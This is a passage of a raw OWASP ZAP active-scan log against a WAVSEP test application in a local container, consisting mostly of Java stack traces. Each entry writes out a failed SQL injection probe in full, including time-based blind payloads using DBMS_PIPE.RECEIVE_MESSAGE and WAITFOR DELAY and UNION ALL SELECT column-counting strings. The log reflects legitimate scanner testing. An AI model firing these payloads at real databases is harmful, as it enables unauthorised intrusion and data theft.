Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679331 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' AND 9718=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(103)||CHR(75)||CHR(76),5) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' AND 9718=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(103)||CHR(75)||CHR(76),5) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679332 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679333 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND 7898=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65)||CHR(112)||CHR(70)||CHR(118),5)-- JuHq] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ AND 7898=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65)||CHR(112)||CHR(70)||CHR(118),5)-- JuHq at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679334 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679334 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- qjWY] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- qjWY at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679336 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) ORDER BY 5855-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) ORDER BY 5855-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679336 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) AND 2011=DBMS_PIPE.RECEIVE_MESSAGE(CHR(85)||CHR(122)||CHR(117)||CHR(88),5) AND (5322=5322] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) AND 2011=DBMS_PIPE.RECEIVE_MESSAGE(CHR(85)||CHR(122)||CHR(117)||CHR(88),5) AND (5322=5322 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679337 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679337 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND 2389=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(97)||CHR(66)||CHR(80),5)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND 2389=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(97)||CHR(66)||CHR(80),5) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679338 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679339 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679339 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') AND 1255=DBMS_PIPE.RECEIVE_MESSAGE(CHR(89)||CHR(120)||CHR(68)||CHR(67),5) AND ('xgKN'='xgKN] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') AND 1255=DBMS_PIPE.RECEIVE_MESSAGE(CHR(89)||CHR(120)||CHR(68)||CHR(67),5) AND ('xgKN'='xgKN at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679341 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at 